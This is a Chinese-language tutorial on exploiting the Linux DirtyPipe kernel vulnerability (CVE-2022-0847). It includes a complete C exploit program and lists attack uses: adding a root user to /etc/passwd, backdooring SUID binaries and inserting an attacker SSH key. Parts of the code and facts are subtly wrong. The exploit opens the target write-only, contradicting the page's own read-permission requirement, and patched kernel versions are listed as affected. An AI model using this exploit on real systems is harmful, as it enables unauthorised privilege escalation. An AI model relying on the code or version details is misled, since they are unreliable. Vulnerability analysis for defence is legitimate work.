Linux提权漏洞CVE-2022-0847(DirtyPipe)深度分析与利用教学<\/h1>

1. 漏洞概述<\/h2>
CVE-2022-0847，又称"DirtyPipe"，是Linux内核中的一个提权漏洞，影响5.8及以上版本的内核。该漏洞允许低权限用户向任意只读文件写入数据，从而可能实现权限提升。<\/p>
漏洞类型<\/strong>：类型混淆漏洞（缓冲区标志未初始化）<\/p>
影响范围<\/strong>：Linux内核5.8-5.16.11、5.15.25、5.10.102及更早版本<\/p>
漏洞发现者<\/strong>：Max Kellermann<\/p>

2. 漏洞原理深度解析<\/h2>
2.1 核心机制<\/h3>
该漏洞的核心在于Linux管道(pipe)机制中的缓冲区标志管理不当，具体涉及：<\/p>

PIPE_BUF_FLAG_CAN_MERGE标志<\/strong>：表示管道缓冲区可以合并写入<\/li>
零拷贝机制<\/strong>：通过splice系统调用实现的高效数据传输<\/li>
缓冲区重用时的标志未初始化<\/strong>：关键漏洞点<\/li> <\/ol>
2.2 漏洞利用流程<\/h3>

准备阶段<\/strong>：<\/p>

创建管道并填满缓冲区，设置PIPE_BUF_FLAG_CAN_MERGE标志<\/li>
读取并释放缓冲区，但保留标志<\/li> <\/ul> <\/li>

利用阶段<\/strong>：<\/p>

使用splice进行零拷贝传输，重用带有PIPE_BUF_FLAG_CAN_MERGE标志的缓冲区<\/li>
通过write操作利用保留的标志实现越界写入<\/li> <\/ul> <\/li> <\/ol>
2.3 关键数据结构<\/h3>
struct<\/span> pipe_buffer { <\/span><\/span> struct<\/span> page *<\/span>page; <\/span><\/span> unsigned<\/span> int<\/span> offset, len; <\/span><\/span> const<\/span> struct<\/span> pipe_buf_operations *<\/span>ops; <\/span><\/span> unsigned<\/span> int<\/span> flags; <\/span><\/span> unsigned<\/span> long<\/span> private; <\/span><\/span>}; <\/span><\/span><\/code><\/pre>其中flags<\/code>字段是关键，PIPE_BUF_FLAG_CAN_MERGE标志(0x10)未被正确清除导致漏洞。<\/p> 3. 漏洞利用详细分析<\/h2> 3.1 准备管道缓冲区<\/h3> static<\/span> void<\/span> prepare_pipe<\/span>(int<\/span> p[2<\/span>]) <\/span><\/span>{ <\/span><\/span> if<\/span> (pipe(p)) abort(); <\/span><\/span> <\/span><\/span> const<\/span> unsigned<\/span> pipe_size =<\/span> fcntl(p[1<\/span>], F_GETPIPE_SZ); <\/span><\/span> static<\/span> char<\/span> buffer[4096<\/span>]; <\/span><\/span> <\/span><\/span> \/\/ 填满管道，设置PIPE_BUF_FLAG_CAN_MERGE标志 <\/span><\/span><\/span><\/span> for<\/span> (unsigned<\/span> r =<\/span> pipe_size; r ><\/span> 0<\/span>;) { <\/span><\/span> unsigned<\/span> n =<\/span> r ><\/span> sizeof<\/span>(buffer) ?<\/span> sizeof<\/span>(buffer) :<\/span> r; <\/span><\/span> write(p[1<\/span>], buffer, n); <\/span><\/span> r -=<\/span> n; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 释放缓冲区但保留标志 <\/span><\/span><\/span><\/span> for<\/span> (unsigned<\/span> r =<\/span> pipe_size; r ><\/span> 0<\/span>;) { <\/span><\/span> unsigned<\/span> n =<\/span> r ><\/span> sizeof<\/span>(buffer) ?<\/span> sizeof<\/span>(buffer) :<\/span> r; <\/span><\/span> read(p[0<\/span>], buffer, n); <\/span><\/span> r -=<\/span> n; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2 零拷贝传输(splice)<\/h3> ssize_t nbytes =<\/span> splice(fd, &<\/span>offset, p[1<\/span>], NULL, 1<\/span>, 0<\/span>); <\/span><\/span><\/code><\/pre>关键调用链<\/strong>：<\/p> sys_splice -> __do_splice -> do_splice -> splice_file_to_pipe -> generic_file_splice_read -> call_read_iter -> copy_folio_to_iter -> copy_page_to_iter -> copy_page_to_iter_pipe <\/code><\/pre> splice_file_to_pipe中的关键检查<\/strong>：<\/p> if<\/span> (off_in) { <\/span><\/span> if<\/span> (!<\/span>(in-><\/span>f_mode &<\/span> FMODE_PREAD)) <\/span><\/span> return<\/span> -<\/span>EINVAL; <\/span><\/span> offset =<\/span> *<\/span>off_in; <\/span><\/span>} <\/span><\/span><\/code><\/pre>这解释了为什么利用时偏移量必须从1开始。<\/p> 3.3 触发漏洞写入<\/h3> nbytes =<\/span> write(p[1<\/span>], data, data_size); <\/span><\/span><\/code><\/pre>pipe_write中的关键逻辑<\/strong>：当检测到PIPE_BUF_FLAG_CAN_MERGE标志时，直接调用copy_page_from_iter<\/code>进行写入，绕过权限检查。<\/p> 4. 完整利用代码分析<\/h2> #include<\/span> <unistd.h><\/span> <\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <string.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span> **<\/span>argv) <\/span><\/span>{ <\/span><\/span> if<\/span> (argc !=<\/span> 4<\/span>) { <\/span><\/span> fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA<\/span>\n<\/span>"<\/span>, argv[0<\/span>]); <\/span><\/span> return<\/span> EXIT_FAILURE; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 准备管道 <\/span><\/span><\/span><\/span> int<\/span> p[2<\/span>]; <\/span><\/span> prepare_pipe(p); <\/span><\/span> <\/span><\/span> \/\/ 打开目标文件 <\/span><\/span><\/span><\/span> int<\/span> fd =<\/span> open(argv[1<\/span>], O_WRONLY |<\/span> O_CREAT, 0666<\/span>); <\/span><\/span> if<\/span> (fd <<\/span> 0<\/span>) { <\/span><\/span> perror("open failed"<\/span>); <\/span><\/span> return<\/span> EXIT_FAILURE; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 计算偏移量 <\/span><\/span><\/span><\/span> unsigned<\/span> long<\/span> offset =<\/span> strtoul(argv[2<\/span>], NULL, 0<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 使用splice进行零拷贝传输 <\/span><\/span><\/span><\/span> ssize_t nbytes =<\/span> splice(fd, &<\/span>offset, p[1<\/span>], NULL, 1<\/span>, 0<\/span>); <\/span><\/span> if<\/span> (nbytes <<\/span> 0<\/span>) { <\/span><\/span> perror("splice failed"<\/span>); <\/span><\/span> return<\/span> EXIT_FAILURE; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 触发漏洞写入 <\/span><\/span><\/span><\/span> nbytes =<\/span> write(p[1<\/span>], argv[3<\/span>], strlen(argv[3<\/span>])); <\/span><\/span> if<\/span> (nbytes <<\/span> 0<\/span>) { <\/span><\/span> perror("write failed"<\/span>); <\/span><\/span> return<\/span> EXIT_FAILURE; <\/span><\/span> } <\/span><\/span> <\/span><\/span> printf("It worked!<\/span>\n<\/span>"<\/span>); <\/span><\/span> return<\/span> EXIT_SUCCESS; <\/span><\/span>} <\/span><\/span><\/code><\/pre>5. 漏洞防御与补丁分析<\/h2> 5.1 官方补丁<\/h3> 补丁主要修改了copy_page_to_iter_pipe<\/code>函数，确保在重用缓冲区时正确初始化flags：<\/p> buf-><\/span>flags =<\/span> 0<\/span>; <\/span><\/span><\/code><\/pre>5.2 防御措施<\/h3> 及时更新内核到修复版本<\/li> 限制低权限用户对敏感文件的访问<\/li> 使用内核安全模块如SELinux进行额外保护<\/li> <\/ol> 6. 漏洞利用限制<\/h2> 偏移量限制<\/strong>：必须从偏移量1开始写入<\/li> 文件大小限制<\/strong>：写入不能超过原文件大小<\/li> 权限要求<\/strong>：需要对目标文件有读权限<\/li> <\/ol> 7. 实际利用场景<\/h2> 修改\/etc\/passwd<\/strong>：添加特权用户<\/li> 修改SUID二进制文件<\/strong>：创建后门<\/li> 修改SSH authorized_keys<\/strong>：添加攻击者公钥<\/li> <\/ol> 8. 扩展思考<\/h2> 该漏洞展示了内核内存管理复杂性的安全挑战<\/li> 零拷贝优化可能引入新的攻击面<\/li> 标志位管理在内核安全中的重要性<\/li> <\/ol> 9. 参考资源<\/h2> 官方漏洞公告和补丁<\/li> Max Kellermann的原始漏洞报告<\/li> Linux内核源码分析<\/li> 相关安全研究论文<\/li> <\/ol> 通过深入理解DirtyPipe漏洞，我们不仅能够掌握其利用方法，更能从中学习到内核安全的重要原则和防御思路。这种类型混淆漏洞在内核中并不罕见，分析此类漏洞有助于提高整体安全意识和防御能力。<\/p>